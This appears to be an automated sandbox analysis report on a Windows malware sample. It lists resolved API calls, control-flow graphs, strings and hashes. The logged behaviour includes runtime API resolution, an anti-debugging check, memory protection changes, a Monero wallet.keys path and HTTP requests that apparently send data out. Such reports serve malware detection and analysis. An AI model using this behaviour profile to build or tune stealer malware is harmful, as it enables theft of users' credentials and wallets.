16239->16240 16243 e6fb0 16240->16243 16242 e98ad codecvt 16242->15999 16246 e6d40 16243->16246 16247 e6d63 16246->16247 16259 e6d59 16246->16259 16247->16259 16260 e6660 16247->16260 16249 e6dbe 16249->16259 16266 e69b0 16249->16266 16251 e6e2a 16252 e6ee6 VirtualFree 16251->16252 16254 e6ef7 16251->16254 16251->16259 16252->16254 16253 e6f41 16257 f89f0 2 API calls 16253->16257 16253->16259 16254->16253 16255 e6f38 16254->16255 16256 e6f26 FreeLibrary 16254->16256 16258 f89f0 2 API calls 16255->16258 16256->16254 16257->16259 16258->16253 16259->16242 16265 e668f VirtualAlloc 16260->16265 16262 e6730 16263 e673c 16262->16263 16264 e6743 VirtualAlloc 16262->16264 16263->16249 16264->16263 16265->16262 16265->16263 16267 e69c9 16266->16267 16271 e69d5 16266->16271 16268 e6a09 LoadLibraryA 16267->16268 16267->16271 16269 e6a32 16268->16269 16268->16271 16273 e6ae0 16269->16273 16276 f8a10 GetProcessHeap RtlAllocateHeap 16269->16276 16271->16251 16272 e6ba8 GetProcAddress 16272->16271 16272->16273 16273->16271 16273->16272 16274 f89f0 2 API calls 16274->16273 16275 e6a8b 16275->16271 16275->16274 16276->16275

                            Executed Functions

                            Function 000F9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 f9860-f9874 call f9750 663 f987a-f9a8e call f9780 GetProcAddress * 21 660->663 664 f9a93-f9af2 LoadLibraryA * 5 660->664 663->664 666 f9b0d-f9b14 664->666 667 f9af4-f9b08 GetProcAddress 664->667 669 f9b46-f9b4d 666->669 670 f9b16-f9b41 GetProcAddress * 2 666->670 667->666 671 f9b4f-f9b63 GetProcAddress 669->671 672 f9b68-f9b6f 669->672 670->669 671->672 673 f9b89-f9b90 672->673 674 f9b71-f9b84 GetProcAddress 672->674 675 f9b92-f9bbc GetProcAddress * 2 673->675 676 f9bc1-f9bc2 673->676 674->673 675->676
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,012223B0), ref: 000F98A1
                            • GetProcAddress.KERNEL32(74DD0000,01222218), ref: 000F98BA
                            • GetProcAddress.KERNEL32(74DD0000,01222320), ref: 000F98D2
                            • GetProcAddress.KERNEL32(74DD0000,01222410), ref: 000F98EA
                            • GetProcAddress.KERNEL32(74DD0000,01222350), ref: 000F9903
                            • GetProcAddress.KERNEL32(74DD0000,01228F88), ref: 000F991B
                            • GetProcAddress.KERNEL32(74DD0000,01215AD0), ref: 000F9933
                            • GetProcAddress.KERNEL32(74DD0000,01215C10), ref: 000F994C
                            • GetProcAddress.KERNEL32(74DD0000,01222308), ref: 000F9964
                            • GetProcAddress.KERNEL32(74DD0000,012222A8), ref: 000F997C
                            • GetProcAddress.KERNEL32(74DD0000,01222488), ref: 000F9995
                            • GetProcAddress.KERNEL32(74DD0000,01222230), ref: 000F99AD
                            • GetProcAddress.KERNEL32(74DD0000,01215D50), ref: 000F99C5
                            • GetProcAddress.KERNEL32(74DD0000,012223E0), ref: 000F99DE
                            • GetProcAddress.KERNEL32(74DD0000,012224A0), ref: 000F99F6
                            • GetProcAddress.KERNEL32(74DD0000,01215C90), ref: 000F9A0E
                            • GetProcAddress.KERNEL32(74DD0000,01222458), ref: 000F9A27
                            • GetProcAddress.KERNEL32(74DD0000,012224B8), ref: 000F9A3F
                            • GetProcAddress.KERNEL32(74DD0000,01215AB0), ref: 000F9A57
                            • GetProcAddress.KERNEL32(74DD0000,01222500), ref: 000F9A70
                            • GetProcAddress.KERNEL32(74DD0000,01215E10), ref: 000F9A88
                            • LoadLibraryA.KERNEL32(01222428,?,000F6A00), ref: 000F9A9A
                            • LoadLibraryA.KERNEL32(012223F8,?,000F6A00), ref: 000F9AAB
                            • LoadLibraryA.KERNEL32(01222440,?,000F6A00), ref: 000F9ABD
                            • LoadLibraryA.KERNEL32(01222470,?,000F6A00), ref: 000F9ACF
                            • LoadLibraryA.KERNEL32(01222248,?,000F6A00), ref: 000F9AE0
                            • GetProcAddress.KERNEL32(75A70000,01222260), ref: 000F9B02
                            • GetProcAddress.KERNEL32(75290000,012222D8), ref: 000F9B23
                            • GetProcAddress.KERNEL32(75290000,01222278), ref: 000F9B3B
                            • GetProcAddress.KERNEL32(75BD0000,012222F0), ref: 000F9B5D
                            • GetProcAddress.KERNEL32(75450000,01215E50), ref: 000F9B7E
                            • GetProcAddress.KERNEL32(76E90000,01229048), ref: 000F9B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 000F9BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 000F9BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 705005d6d5021427ada9aac8f2c10c87cc7683d88b0fbca609928a68090a192f
                            • Instruction ID: a514ba6b3d17cb809fa38903789622a70c297eff0c0b47e15148666f11586721
                            • Opcode Fuzzy Hash: 705005d6d5021427ada9aac8f2c10c87cc7683d88b0fbca609928a68090a192f
                            • Instruction Fuzzy Hash: 34A16CB5500A009FD366EFA8EE88A663BFDF74C301F04492EE615C3264D739A843DB56
                            Function 000E45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 e45c0-e4695 RtlAllocateHeap 781 e46a0-e46a6 764->781 782 e474f-e47a9 VirtualProtect 781->782 783 e46ac-e474a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E460E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000E479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E46B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E46AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E45F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E45E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E46CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E45DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E45D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E46C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E4734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E46D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000E45C7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: f68d86471707ea7ef6ef1a9d1d203a689673e67260375e2b501f8e4fd58d9d4a
                            • Instruction ID: 6f92967995500fee7e93c9f64a3920428982cdf7d4b5a534c5133d119be8d4f4
                            • Opcode Fuzzy Hash: f68d86471707ea7ef6ef1a9d1d203a689673e67260375e2b501f8e4fd58d9d4a
                            • Instruction Fuzzy Hash: 3941B6707DB644EAD734B7E4884EEAE7A57FF46F04F605288B941562C2CBF06940C927
                            Function 000E4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 e4880-e4942 call fa7a0 call e47b0 call fa740 * 5 InternetOpenA StrCmpCA 816 e494b-e494f 801->816 817 e4944 801->817 818 e4ecb-e4ef3 InternetCloseHandle call faad0 call e9ac0 816->818 819 e4955-e4acd call f8b60 call fa920 call fa8a0 call fa800 * 2 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa920 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa920 call fa8a0 call fa800 * 2 InternetConnectA 816->819 817->816 829 e4ef5-e4f2d call fa820 call fa9b0 call fa8a0 call fa800 818->829 830 e4f32-e4fa2 call f8990 * 2 call fa7a0 call fa800 * 8 818->830 819->818 905 e4ad3-e4ad7 819->905 829->830 906 e4ad9-e4ae3 905->906 907 e4ae5 905->907 908 e4aef-e4b22 HttpOpenRequestA 906->908 907->908 909 e4ebe-e4ec5 InternetCloseHandle 908->909 910 e4b28-e4e28 call fa9b0 call fa8a0 call fa800 call fa920 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa920 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa920 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa9b0 call fa8a0 call fa800 call fa920 call fa8a0 call fa800 call fa740 call fa920 * 2 call fa8a0 call fa800 * 2 call faad0 lstrlen call faad0 * 2 lstrlen call faad0 HttpSendRequestA 908->910 909->818 1021 e4e32-e4e5c InternetReadFile 910->1021 1022 e4e5e-e4e65 1021->1022 1023 e4e67-e4eb9 InternetCloseHandle call fa800 1021->1023 1022->1023 1024 e4e69-e4ea7 call fa9b0 call fa8a0 call fa800 1022->1024 1023->909 1024->1021
                            APIs
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000E4839
                              • Part of subcall function 000E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000E4849
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000E4915
                            • StrCmpCA.SHLWAPI(?,0122E878), ref: 000E493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000E4ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00100DDB,00000000,?,?,00000000,?,",00000000,?,0122E8A8), ref: 000E4DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000E4E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000E4E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000E4E49
                            • InternetCloseHandle.WININET(00000000), ref: 000E4EAD
                            • InternetCloseHandle.WININET(00000000), ref: 000E4EC5
                            • HttpOpenRequestA.WININET(00000000,0122E768,?,0122E458,00000000,00000000,00400100,00000000), ref: 000E4B15
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • InternetCloseHandle.WININET(00000000), ref: 000E4ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 3922c1bb3b3b27a07740aca36809784e61685c688b70674cfd9315b6ff71720e
                            • Instruction ID: 8bd49a981ec709be0b608b54227667fc2803e16e425f35dfc80e5fe8c0525042
                            • Opcode Fuzzy Hash: 3922c1bb3b3b27a07740aca36809784e61685c688b70674cfd9315b6ff71720e
                            • Instruction Fuzzy Hash: 3D12C2B1A1011CABDB15EB90DC52FEEB378AF55340F504199B20A62492DFB42F4ADF62
                            Function 000F7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000E11B7), ref: 000F7880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F7887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 000F789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: b9e57bb328917f8c81deb9e3a138da41240f62e7ce4d783af89b497c6361353b
                            • Instruction ID: d0ee3491f1753ce19cc105dfec67f558fe09de787e1f73f9515a51f1071f328a
                            • Opcode Fuzzy Hash: b9e57bb328917f8c81deb9e3a138da41240f62e7ce4d783af89b497c6361353b
                            • Instruction Fuzzy Hash: 9FF04FB1944608EBC714DF98DD49FAEBBBCEB04711F10065AFA05A2680C77415058BA2
                            Function 000E1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 7f2160e6e6fe1ece02ae0173e004efe80de8e0f66848c7fd743714d9d63e90e5
                            • Instruction ID: 1f3fb5bf801dd56f9b579d7a084c666e6d22627d6465d646796b765e3560f5f7
                            • Opcode Fuzzy Hash: 7f2160e6e6fe1ece02ae0173e004efe80de8e0f66848c7fd743714d9d63e90e5
